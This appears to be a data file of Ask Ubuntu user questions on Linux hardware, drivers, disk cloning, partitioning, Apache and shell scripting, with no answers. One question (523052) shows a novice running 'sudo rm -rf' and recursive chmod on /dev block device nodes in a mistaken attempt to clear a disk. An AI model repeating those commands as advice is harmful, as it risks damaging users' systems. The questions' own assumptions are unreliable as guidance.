2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] error : timed out
523018	sony vaio vpcf115fg	i would like to ask about does this model sony vaio vpcf115fg supporting the ubuntu in terms of hardware . i scared if it doesnt support since it might not be compatible and so on . please help me.i hate this vaio program , making my computer lag to load tons of vaio programmes . this is the spec for this model : http : //www.sony-asia.com/product/vpcf115fg intel® core™ i5-520m processor 2.40 ghz with turbo boost up to 2.93 ghz genuine windows® 7 home premium ( 64-bit ) 16.4 '' wide ( wxga++ : 1600 x 900 ) vaio display nvidia® geforce® 310m gpu with cuda™ technology 500 gb hard disk drive advanced connectivity : esata/usb port , hdmi output connecct thank you .
523020	determine which package ( s ) were installed from a particular source	some time ago , i installed a package from a qantal ppt source - at the time , it was only available in the quantal ( 12.10 ) repos ; i 'm running precise ( 12.04 ) . the qantal repo has now been removed from the ubuntu mirror i use ( internode ) . i 'm inclined just to remove the quantal repo from my souces , but i 'd like to either remove the quantal package or source it from somewhere else first . problem is i no longer remember which package ( s ) it was . so , how can i determine which packages have been installed from the qantal repo ?
523025	top showing a bunch of rcuos processes	i ran top and im showing a ton of these rcuos processes below . what are these ? top - 21:41:15 up 22 days , 19:20 , 1 user , load average : 0.00 , 0.01 , 0.05 tasks : 332 total , 1 running , 331 sleeping , 0 stopped , 0 zombie cpu ( s ) : 0.0 % us , 0.0 % sy , 0.0 % ni , 99.9 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 32910904k total , 2232224k used , 30678680k free , 246636k buffers swap : 33517564k total , 0k used , 33517564k free , 1048244k cached pid user pr ni virt res shr s % cpu % mem time+ command 3098 root 20 0 11.8g 113m 9.9m s 1 0.4 67:57.98 asterisk 12 root 20 0 0 0 0 s 0 0.0 0:53.61 rcuos/3 1130 root 39 19 0 0 0 s 0 0.0 78:26.78 kipmi0 1735 root 20 0 15988 740 540 s 0 0.0 17:34.69 irqbalance 1875 zabbix 20 0 89416 2472 1828 s 0 0.0 12:55.47 zabbix_agentd 1 root 20 0 24316 2288 1336 s 0 0.0 0:05.06 init 2 root 20 0 0 0 0 s 0 0.0 0:00.25 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:02.40 ksoftirqd/0 5 root 0 -20 0 0 0 s 0 0.0 0:00.00 kworker/0:0h 6 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/u48:0 8 root 20 0 0 0 0 s 0 0.0 4:55.92 rcu_sched 9 root 20 0 0 0 0 s 0 0.0 1:31.03 rcuos/0 10 root 20 0 0 0 0 s 0 0.0 0:54.04 rcuos/1 11 root 20 0 0 0 0 s 0 0.0 0:53.16 rcuos/2 13 root 20 0 0 0 0 s 0 0.0 0:45.96 rcuos/4 14 root 20 0 0 0 0 s 0 0.0 0:41.84 rcuos/5 15 root 20 0 0 0 0 s 0 0.0 0:02.56 rcuos/6 16 root 20 0 0 0 0 s 0 0.0 0:07.25 rcuos/7 17 root 20 0 0 0 0 s 0 0.0 0:12.06 rcuos/8 18 root 20 0 0 0 0 s 0 0.0 0:12.14 rcuos/9 19 root 20 0 0 0 0 s 0 0.0 0:11.21 rcuos/10 20 root 20 0 0 0 0 s 0 0.0 0:05.66 rcuos/11 21 root 20 0 0 0 0 s 0 0.0 1:39.42 rcuos/12 22 root 20 0 0 0 0 s 0 0.0 0:35.66 rcuos/13 23 root 20 0 0 0 0 s 0 0.0 0:26.46 rcuos/14 24 root 20 0 0 0 0 s 0 0.0 0:00.88 rcuos/15 25 root 20 0 0 0 0 s 0 0.0 0:00.30 rcuos/16 26 root 20 0 0 0 0 s 0 0.0 0:31.93 rcuos/17 27 root 20 0 0 0 0 s 0 0.0 0:18.58 rcuos/18 28 root 20 0 0 0 0 s 0 0.0 0:20.53 rcuos/19 29 root 20 0 0 0 0 s 0 0.0 0:44.95 rcuos/20 30 root 20 0 0 0 0 s 0 0.0 0:01.92 rcuos/21 31 root 20 0 0 0 0 s 0 0.0 0:00.24 rcuos/22 32 root 20 0 0 0 0 s 0 0.0 0:05.01 rcuos/23 33 root 20 0 0 0 0 s 0 0.0 0:00.00 rcu_bh 34 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/0 35 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/1 36 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/2 37 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/3 38 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/4 39 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/5 40 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/6 41 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/7 42 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/8 43 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/9 44 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/10 45 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/11 46 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/12 47 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/13 48 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/14 49 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/15 50 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/16 51 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/17 52 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/18 53 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/19 54 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/20 55 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/21 56 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/22 57 root 20 0 0 0 0 s 0 0.0 0:00.00 rcuob/23 58 root rt 0 0 0 0 s 0 0.0 0:00.87 migration/0 59 root rt 0 0 0 0 s 0 0.0 0:08.47 watchdog/0 60 root rt 0 0 0 0 s 0 0.0 0:08.41 watchdog/1
523027	'sudo lshw ' yielding unexpected output	i 'm running chrubuntu 14.04 lts on my asus m004u chromebox , and i wanted to find out information about the disks connected . i tried sudo lshw , but got command not found . after attempting to install it using sudo apt-get install lshw , executing sudo lshw give me : terminate called after throwing an instance of 'std : :bad_alloc' what ( ) : std : :bad_alloc any ideas whats going on ?
523029	how to let virtualbox guest capture the full screen ( including system bar area ) ?	i am using a windows 7 ( 64 bit ) guest with an ubuntu 14.04 ( 64 bit ) host . i just recently upgraded to virtualbox 4.3.16 r95972 , although this problem appeared before upgrade -- at the very least in the previous version . the virtualbox extension pack is the latest edition and guest additions is installed on the guest os . my problem is that when i put the guest os into full-screen mode , the ubuntu system bar remains on top , regardless of where the mouse focus is . there is also a unity-style shadow behind where the virtualbox mini menu is hiding in the bottom center . i ca n't remember exactly when this started happening unfortunately . i also noticed that on the unity sidebar context menu for virtualbox , there is now a 3rd item called qt-subapplication , which i suspect is the virtualbox mini-menu , and unity treating it as a separate window is why it has the shadow , and potentially why the guest os window ca n't capture the fullscreen . i 'm guessing this might be a bug of some sort , but , if it is , i suspect it 's a bug in the form of some cool new feature of unity that canonical is unwilling to change , such that it falls to the virtualbox developers to comply with the new feature . as such , i do n't see it being fixed anytime soon , so my question would be about possible workarounds . so , anybody have any ideas about how to keep unity from capturing the mini-menu as a separate window and preventing the guest os from capturing fullscreen ? thanks !
523030	dell vostro 14 3446 : trackpad detected as mouse ( or something else )	for some reason , my trackpad is being detected as mouse in all the distro that i tried ( ubuntu 14.04 , linux mint 17 , crunchbang , salix ) except ubuntu 12.04 . here is the relevant output of /var/log/xorg.0.log [ 25.350 ] ( ii ) config/udev : adding input device dll0662:00 06cb:2985 ( /dev/input/event13 ) [ 25.350 ] ( ** ) dll0662:00 06cb:2985 : applying inputclass `` evdev pointer catchall '' [ 25.350 ] ( ii ) using input driver 'evdev ' for 'dll0662:00 06cb:2985' [ 25.350 ] ( ** ) dll0662:00 06cb:2985 : always reports core events [ 25.350 ] ( ** ) evdev : dll0662:00 06cb:2985 : device : `` /dev/input/event13 '' [ 25.351 ] ( -- ) evdev : dll0662:00 06cb:2985 : vendor 0x6cb product 0x2985 [ 25.351 ] ( -- ) evdev : dll0662:00 06cb:2985 : found 3 mouse buttons [ 25.351 ] ( -- ) evdev : dll0662:00 06cb:2985 : found relative axes [ 25.351 ] ( -- ) evdev : dll0662:00 06cb:2985 : found x and y relative axes [ 25.351 ] ( ii ) evdev : dll0662:00 06cb:2985 : configuring as mouse [ 25.351 ] ( ** ) evdev : dll0662:00 06cb:2985 : yaxismapping : buttons 4 and 5 [ 25.351 ] ( ** ) evdev : dll0662:00 06cb:2985 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 25.351 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/int33c3:00/i2c-11/i2c-dll0662:00/input/input13/event13 '' [ 25.351 ] ( ii ) xinput : adding extended input device `` dll0662:00 06cb:2985 '' ( type : mouse , id 12 ) [ 25.351 ] ( ii ) evdev : dll0662:00 06cb:2985 : initialized for relative axes . [ 25.351 ] ( ** ) dll0662:00 06cb:2985 : ( accel ) keeping acceleration scheme 1 [ 25.351 ] ( ** ) dll0662:00 06cb:2985 : ( accel ) acceleration profile 0 [ 25.351 ] ( ** ) dll0662:00 06cb:2985 : ( accel ) acceleration factor : 2.000 [ 25.351 ] ( ** ) dll0662:00 06cb:2985 : ( accel ) acceleration threshold : 4 [ 25.351 ] ( ii ) config/udev : adding input device dll0662:00 06cb:2985 ( /dev/input/mouse0 ) [ 25.351 ] ( ii ) no input driver specified , ignoring this device . [ 25.351 ] ( ii ) this device may have been added with another device file . any idea why this is happening and how to prevent it ? ps . dell has provided some sort of driver at http : //www.dell.com/support/home/us/en/19/drivers/driversdetails ? driverid=5v4hn but the installation fails both on ubuntu 12.04 and 14.04 with this message : ( reading database ... 147284 files and directories currently installed . ) preparing to unpack ... /oem-touchpad-alps-synaptics-dkms_0.1_all.deb ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 0.1 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . unpacking oem-touchpad-alps-synaptics-dkms ( 0.1 ) over ( 0.1 ) ... setting up oem-touchpad-alps-synaptics-dkms ( 0.1 ) ... loading new oem-touchpad-alps-synaptics-0.1 dkms files ... first installation : checking all kernels ... building only for 3.13.0-24-generic building for architecture amd64 building initial module for 3.13.0-24-generic error ! bad return status for module build on kernel : 3.13.0-24-generic ( amd64 ) consult /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/make.log for more information . /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/make.log contains the following : dkms make.log for oem-touchpad-alps-synaptics-0.1 for kernel 3.13.0-24-generic ( amd64 ) fri sep 12 01:18:44 utc 2014 make : entering directory `/var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build' make -c /lib/modules/3.13.0-24-generic/build m=/var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-24-generic' cc [ m ] /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/appletouch.o cc [ m ] /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/bcm5974.o cc [ m ] /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.o /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.c:49:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘gpio_mouse_probe’ static int __devinit gpio_mouse_probe ( struct platform_device *pdev ) ^ /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.c:153:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘gpio_mouse_remove’ static int __devexit gpio_mouse_remove ( struct platform_device *pdev ) ^ /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.c:174:12 : error : ‘gpio_mouse_probe’ undeclared here ( not in a function ) .probe = gpio_mouse_probe , ^ /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.c:175:2 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function- declaration ] .remove = __devexit_p ( gpio_mouse_remove ) , ^ /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.c:175:25 : error : ‘gpio_mouse_remove’ undeclared here ( not in a function ) .remove = __devexit_p ( gpio_mouse_remove ) , ^ /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.c:23:13 : warning : ‘gpio_mouse_scan’ defined but not used [ -wunused-function ] static void gpio_mouse_scan ( struct input_polled_dev *dev ) ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build/gpio_mouse.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' make : *** [ all ] error 2 make : leaving directory `/var/lib/dkms/oem-touchpad-alps-synaptics/0.1/build' thanks
523033	cs : go in wine , fullscreen freezes when alt-tabing and overlaps everything	i have a strange issue with counterstrike : global offensive , which is n't natively available for linux , so i use wine to play it . every time i accidentaly tab out of the fullscreen game the game window freezes and keeps overlapping everything . it seems to be just a visual problem as the game continues in the background . is it a wine or general problem ? any idea how to fix it ? thank you , steffen
523035	how to mount/install sandisk ultra 8gb sd disk in nec versa e6310	as a total neophyte i am trying to learn how to use ubuntu 14.04 on an old laptop . i found this class 6 sd card and tried using it as additional ram , but my current system does not recognise the sd card . what do i need to do in order to use it please ? a blow-by-blow description would be most welcome . thank you , sam .
523036	what does this gray space in my hdd mean ?	it seems like there 's something taking up a chunk of extra space and i have no clue what it is or how to check .
523037	how would i speed up a full disk dd ?	i am doing a dd on two identical drives with this command : dd if=/dev/sda of=/dev/sdb bs=4096 both hard drives are the exact same model number , and both have 1tb of storage space . /dev/sda uses a blocksize of 4096 . /dev/sda is a local drive and /dev/sdb is a remote caddy . i might be able to use the following protocols : usb2.0 highspeed ( currently the plan ) gigabit over-the-network clone ( really do not want to even try this ) usb3.0 ( if i find my other drive caddy ) esata ( if i find/buy a cable ) sata ( if i find/buy a cable , got ta love laptop cd drives ) is there a way to run this drive copy that takes less that 96 hours ? i am open to using tools other than dd . i need to clone the following partitions ( including uuids ) fat32 efi partition ( * ) ntfs windows partition ( * ) hfs+ osx partition ext4 ubuntu partition ( * ) swap partition ( * ) * supported by clonezilla i have tried clonezilla ( and it was much faster ) , but it does not support hfs+ smart copying , which i need . maybe the newest version supports this ? when i made my first clone , i did all of the partitions except hfs+ and it went very quickly . ( no more than 3 hours total )
523038	installing ubuntu 14.04 next to windows 7 on a sata drive set to raid	i know there are a lot of similar installation questions but i have tried multiple solutions posted in them and ca n't figure this out . i am trying to install ubuntu on a partitioned hdd with windows 7 on another partition . the sata controller for the hdd is set to raid but there is only one hdd . i just recently reinstalled windows and i somehow had the sata controller default to raid without paying attention even though i do n't need it . the ubuntu installer recognizes the hdd but it thinks it is one big 1tb space and does n't detect the presence of windows or the partitions . gparted recognizes the partitions if i start ubuntu from the usb key . i am hoping to avoid reinstalling windows in addition to ubuntu in order to change the setting away from raid . any ideas ? thank you for any help .
523039	contrast/gamma different than in nvidia-settings	hello fellow ubuntuers ! my ubuntu displays less bright tones ( like darker greys ) much darker as they should , gamma and/or brightness seem to be messed up . when i start nvidia-settings the colors instantly change to perfect - but when i start a fullscreen game it changes back to less optimal as before . how can i keep the nvidia-settings settings permanent ? also in 3d applications ? greetings and thank you !
523040	i want a task bar at the top	i know 'tint2 ' , but its position is the bottom . ( actually , i like lubuntu and set the taskbar at the top ) i want it at the top . is there any application ?
523044	how can i install applications ( with apt-get ) to an external disk ?	i 'm on a chromebook running ubuntu inside a chroot via crouton . thus , i have limited space . however , i have an external 32gb ( extremely ) high-speed sd card . i 'd like to install some of my larger programs via apt-get onto the external disk rather than internal ssd . what 's the best way to execute this ? most of my apt-get installations will stay in the internal drive so i should n't symlink the whole /opt directory . is it safest and most efficient to install large packages via apt-get to the default directory and then cut the specific package 's files and folders to the sd card and symlink them back to the original location ? in addition , when i 'm dealing with a mixture of software and files , what is the best format for my sd card ? i do n't intend on sharing files with other devices/os 's via the sd card often or ever .
523046	can not connect to internet on wired connection	i just built a computer and freshly installed ubuntu 14.04 on a new hdd but can not connect to the internet when plugging in an ethernet cable . my computer does n't have a wireless adapter so wireless is n't an option . i 've tried going to `` edit connections '' and adding a new ethernet connection via the ipv4 settings but have n't had any luck . after running ping -c3 192.168.2.1 ( my router 's address ) i get : 3 packets transmitted , 3 received , 0 % packet loss , time 1999ms rtt min/avg/max/mdev = 0.030/0.033/0.037/0.007 ms i 've read somewhere that i need to specify dns server address such as 8.8.8.8 in different places but it has n't worked for me . can anyone suggest what i should try next ?
523047	ubuntu server 14.04.1 not installing to hdd	im am trying to install ubnutu server 14.04.1 to the main hdd in a computer from a flashdrive , in the installer i select the hdd as the install location but instead it wipes my flash drive and install to it instead
523049	how to increase maxpower of specific usb port	it takes long while to charge mobile phone by usb port . how do i specifically increase maxpower of usb port ? this cmd help to understand maxpower of usb port root @ rohit-pc : /home/rnztx # lsusb -v|egrep `` ^bus|maxpower '' bus 002 device 003 : id 064e : a103 suyin corp. acer/hp integrated webcam [ cn0314 ] maxpower 500ma bus 002 device 011 : id 22b8:2e76 motorola pcs maxpower 500ma bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub maxpower 0ma bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub maxpower 0ma bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub maxpower 0ma bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub maxpower 0ma bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub maxpower 0ma bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub maxpower 0ma bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub maxpower 0ma bus 003 device 003 : id 0a5c:2151 broadcom corp. bluetooth maxpower 100ma bus 003 device 002 : id 08ff:1600 authentec , inc. aes1600 maxpower 100ma bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub maxpower 0ma
523051	best ide for php/web developement in ubuntu	can anyone suggest an ide for php development in ubuntu 14.04 . in netbeans fonts looks narrow and ugly . is there anyother alternative ? what about aptana studio 3 ?
523052	sudo chmod 755 /dev/sda7 -r simply returns a new command prompt line ?	i am logged into my computer through the guest account , because i am unable to login through the master/admin . account via user interface . ( simply a blank , blue screen appears upon login . ) so i 'm using ctrl+alt+f1 to access the master account via terminal . my goal is to clean up whatever is inside /dev/sda7 , as it 's 100 % used . i 've tried : '' ls -a /dev/sda7 '' hoping that this would return a list of sub-directories & files within /dev/sda7 , but all that is returned is : '' /dev/sda7 '' ( in the color yellow ) . since i ca n't seem to return a list of sub-directories & files on the partition , i tried : '' sudo chmod 755 /dev/sda7 -r '' in hopes of editing the contents of the directory . what 's returned in this case is an immediate , new command line prompt . it 's as if it 's recognized that i 've typed something , and maybe it did something in the background , or maybe there 's an error , or maybe it just wants more input from me . as a last resort , i 've tried removing a different directory : '' sudo rm -rf /dev/sda6 '' again , i was returned to a new command line prompt . how can i view the contents of directories and files found on /dev/sda7 ? how can i remove them ? keep in mind , i 'm technically logged into an interface via guest account , but have successfully logged into master/admin account via terminal . thanks , all . ( the word `` i '' intentionally left lowercase . ) as instructed : d @ d-satellite-c655 : ~ $ ls -l /dev/sda6 /dev/sda7 brw-rw -- -- 1 root disk 8 , 6 sep 11 21:38 /dev/sda6 brw-rw -- -- 1 rood disk 8 , 7 sep 11 21:38 /dev/sda7 note : bold text denotes text that was returned as yellow , instead of the standard grey on black .
523053	touchpad not working after installing ubuntu 13.10	my computer , dell -inspiron 14 3000 series ( 3442 ) , 64 bit after installing ubuntu 13.10 shows no reponce to my touch pad . it worked fine in windows 7 , my previous os . it works fine in using a mouse.please give me an answer .
523056	pruple screen of grub do n't disappear	i had dual-booted my computer with ubuntu and win8 . both were working fine till yesterday . but now when i start ubuntu the purple screen of grub-2 wo n't disappear . what should i do , there is no splash screen and no home screen just that purple grub screen ?
523059	linux lte 12.04 screen is blinking and printing some file names while booting and the screen is blinking on lenova ideapad z460	i have installed linux 12.04 on my lenova ideapad z460 . it is not working well . it has below issues : = > screen is blinking some times before booting = > while booting displaying/checking for file names . = > touch pad is not working . please tell do i need to install any packages ? thank you !
523061	odd flickering after video driver update	i 'm not sure how to describe this other than to show you guys . i captured a video and uploaded it to youtube here : http : //youtu.be/bp25fyy_gsi notice how the tab selection keeps changing by itself without me selecting anything with the mouse or keyboard . also hovering over different parts of the window will change the tab selection and the display . this happens in firefox as well , so it is not limited to that one application . in firefox the page would constantly scroll up and down really quickly and look really `` jerky . '' this started happening after i updated my video card driver for my gtx 560 ti from 331.38 to 340.32 using the xorg-edgers ppa . i did the update by performing a sudo apt-get purge nvidia-331 followed by all of the other nvidia packages . after which i performed a restart and installed the nvidia-340 package . did i break something in the process ? how do i fix it ? any help is appreciated . thanks edit using ubuntu 14.04.1 lts with nvidia gtx 560 ti .
523063	epson printer scanner fax	i have epson printer l555 with scanner and fax . i have found l555 printer driver but not able to find driver for fax and scanner . i found vue scan software but even it did n't detect my scanner and plus its a paid version . please let me know if there is any other way to install this driver . i hope if linux add drivers for printers in installation . please suggest
523064	in ubuntu sdk , i ca n't test apps on my nexus phone ( server rejected key )	i just made my first webapp for ubuntu touch with the ubuntu sdk . if i test using deploy locally , it works fine . if i test on my device , it returns me : '' -1 : error : could not connect to host : server rejected key . is the device connected and set up for network access ? '' i have network access ( i tested wi-fi and 3g , no difference ) , device is well connected , seen ready by the sdk , developer mode enabled ... do you have any idea what it 's coming from ? thanks
523067	where exactly is my second hdd ?	im completely new to ubuntu , so this might seem like a silly question , but i 'm not sure where to locate my second hdd . i installed ubuntu onto a computer that had 2 already formatted hard drives in it . i can locate the hdd and it 's partition through the console ( /dev/sdb1 ) so i know it 's there , and i can not mount it to a directory as it is already mounted somewhere i just do n't know where ubuntu locates the drive by default . there is an ejectable `` new volume '' under devices that i suspect may be my drive , but i am unable to write to it at all . any help here would be apreciated , thanks !
523074	problrm in installing software in ubuntu 12.10	error message while installing in ubuntu software centre w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/universe/binary-i386/packages 404 not found [ ip : 91.189.91.13 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead .
523080	inastallation error for kiwix	i have just downbload a file `` kiwix_0.9~beta6.8-1_i386 '' . but when i am trying to installing it with the ubuntu software center then the following error message appears : dependency is not satisfiable : libclucene0ldbl ( > = 0.9.21b ) how can i resolve this error message and download kiwix successfully ?
523085	evaluate expression within awk	i want to create a conditional expression string and pass in an awk script . my script is as below ... comm= '' \ $ 3 == `` hello '' '' awk -f `` ^t '' -v command= '' $ { comm } '' ' { if ( command ) { print `` hye '' } if ( $ 3 == `` hello '' ) { print `` bye '' } } ' test but the statement `` if ( command ) '' always evaluates to true which is not correct . i want to know the correct way of executing this statement.. on running ... ./test_awk.sh it returns hye which is not the expected answer . test file has following ( just a sample ) : hello^thye^tbye many thanks in advance
523086	what does ~/ < directoryname > do ?	i had to use ~/ffmpeg_sources while installing . when i used it , it navigates me to the ffmpeg_sources directory . what does ~/ actually do ?
523088	how do i change the icon for .doc , .odt , .ods .xls .ppt filetypes from libreoffice icon to openoffice icon ?	the `` problem '' i am facing is that i uninstalled the ubuntu 14.04 's default libreoffice and installed openoffice , but the .doc , .xls , .odt , .ods ... . files even though they open by default with openoffice , their icon is still the original libreoffice icon . i was searching every where to find the libreoffice icons but could not find it in /usr/share/icons in any subfolders , i am running out of ideas . where are these settings stored ? i tried the following : 1 . right clicked on a .doc file and click properties and than click on it 's icon image and change it , but this only changes the specific files icon not the icon for all the .doc files . 2 . after uninstalling libreoffice and installing openoffice i created a new user , and logged in as that but even the new user was seeing the icons as libreoffice default icons . which make me think that the settings are rather system wide than user specific settings . 3 . was trying assogiate but it is not available in ubuntu software center anyomore , -- maybe is not for unity desktop . 4 . the solution given at change filetype icon ( pcmanfm lxde ) is referring to an other desktop environment `` lxde '' , -- - i think . 5 . the `` solution '' given in how to change the icons of multiple files from terminal ? is rather a workaround , because as far as i can tell he is modifying the icon for each file , folder individually . i would like this change to happen everywhere in the system and even for new files . thank you ,
523089	locked out need help	i have an allwinner 13 tablet with android os 3.1 . i am locked out . adb debugger not activated . need sd card that will boot device or a way to activate adb via sd card . none of the android reset methods work .
523091	panel in 14.04 is not fully transparent	there are two images just to show what i mean . in 12.04 top panel was 100 % transparent . see the picture below . 12.04 in 14.04 the settings are the same , but there is no 100 % transparency . see the picture below 14.04 is that some kind of bug ? how can be fixed ? regards ,
523092	how to recover ubuntu operating system with my previous data	yesterday i clicked on the system restore button in windows by accident . after that , ubuntu was totally formatted . is there any possibility to recover my operating system with its previous data ?
523093	hp 5520 installation on 14.04	i ca n't get hplip 13.4.6 to unpack correctly in ubuntu 14.04 . some characters are n't recognised . any suggestions ? maxine
523094	where are my disks ?	newbie struggling . i want to use ubuntu-remix-recovery live cd to attempt to recover a crashed disk . i 've got the live cd loaded and bootable , no problem . i need to run ddresuce and save the logfile . with using a live cd , i ca n't save anything on the cd . so i 've got a usb drive plugged in . after stumbling around i found /dev/disk/by-label that shows all my disks . but the value ../../sdg1 or /dev/sdg1 is n't a directory . so how do i get to the data on the disks . do i need to do a mount ? with the live cd , i ca n't save any info . in addition , a command like ls -l | more stops after 1 page of output , so there are a lot of directories that i ca n't even browse if there is more than 1 page . i was pretty good at unix commands 15 years ago but that was 15 years ago . been windows since then . any pointers to a quick start on unbuntu would be helpful . seems most of the online help i 've seen requires you to ask specific question and i 'm not that literate yet . thanks for any pointers .
523096	gpt partitioning on a bios/non-efi motherboard with a ssd	i have a 2 year old intel dh67cl1 bios motherboard ( non-efi ) . i am reading about gpt partitioning and wonder whether it is useful in my case . i have still reservations whether to use gpt and what benefits it offers or continue with mbr . since i read about gpt issues on bios : http : //www.rodsbooks.com/gdisk/bios.html i have a 180gb intel 330 series ssd on to which i propose to install ubuntu-gnome 14.04.1 . i plan to use a recent gparted live cd for partitioning . i may , later install windows 7 ( not sure ) . since , only bios is available how do i boot linux with grub2 ( assuming it as the default bootloader ) . does a bios_boot partition is needed ? ( bios_grub ) how to verify ssd partitions are aligned ? i read , you have to make a 2mb free space before making partitions and then resize it to 1mb free space preceding in gparted for proper alignment . is this still valid ? do we need to keep free , unpartitioned space ( for 180gb 7 % is 13-14gb unpartitioned space ) for `` over provisioning '' tmpfs for logs and other frequently written files ? i have only 4gb ram and will i have to keep the firefox , chrome files on ram ?
523097	got problem to start apache	i got error when i run command throug terminal `` sudo /etc/init.d/apache2 start '' it shows error : apache2 : syntax error on line 237 of /etc/apache2/apache2.conf : syntax error on line 41 of /etc/apache2/sites-enabled/000-default.save : < /virtualhost > directive missing closing ' > ' action 'start ' failed . my /etc/apache2/sites-enabled/000-default file has the below content , < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost >
523099	synchronizing between two lubuntu computer	i want to synchronize my local data ( like user profile , home/documents , /pictures ... ) between two lubuntu computers . is there any way to do this automatically on system startup ? one of these computers is offline . i thought something like windows8 synchronizing by email address .
523100	how to differentiate command from the output using color	i have to differentiate command from the output using color like this $ cat file-name ( this should be in some color say like red ) some test in file output ( this output should be in some other color say like green ) so that i can easy differentiate command from its output in case of commands with large output and i have to make it it work for every command that is typed on terminal if possible even command not found can be printed out in different color
523105	why does sudo prevent catching sigtstp ( ctrl+z ) ?	this program is written to catch sigtstp ( ctrl+z ) and bypass its normal effect , printing a message and returning to its normal operation instead of allowing its process to be suspended : # include < stdio.h > # include < signal.h > void sigproc ( void ) ; int main ( void ) { signal ( sigtstp , sigproc ) ; while ( 1 ) ; return 0 ; } void sigproc ( ) { printf ( `` ctrl + z '' ) ; } it works fine without sudo . but when launched with sudo , the program does n't run as expected .
523106	ubuntu 14.04 - new install on lenovo m30-70 does not see usb sticks , mouse does not work	after new install of ubuntu 14.04 on lenovo m30-70 the computer does not see any usb sticks . also usb mouse does not connect properly . i have to connect the mouse to a turned off computer and than turn it on otherwise it will not work .
